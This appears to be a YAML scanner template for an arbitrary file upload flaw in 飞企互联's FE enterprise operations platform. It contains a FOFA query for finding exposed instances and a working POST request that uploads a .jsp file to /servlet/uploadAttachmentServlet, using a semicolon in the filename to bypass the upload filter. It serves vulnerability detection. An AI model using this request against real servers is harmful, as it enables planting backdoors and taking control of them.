product: FE企业运营管理平台
vName: 飞企互联 FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 飞企互联-FE企业运营管理平台 uploadAttachmentServlet存在文件上传漏洞，攻击者可通过该漏洞在服务器端写入后门文件，任意执行代码，获取服务器权限，进而控制整个web 服务器。
version: ''
note: 如果漏洞存在，验证文件名后有;用来绕过限制，52e039302a62d077.jsp;
search:
  FOFA: app="飞企互联-FE企业运营管理平台" || app="FE-协作平台"
protocol: http
link: https://blog.csdn.net/qq_36618918/article/details/136942769
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /servlet/uploadAttachmentServlet
      file:
        uploadFile:
          - 52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - text/plain
      dataJson:
        json: { "iq": { "query": { "UpdateType": "mail" } } }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 上传成功
            logic: and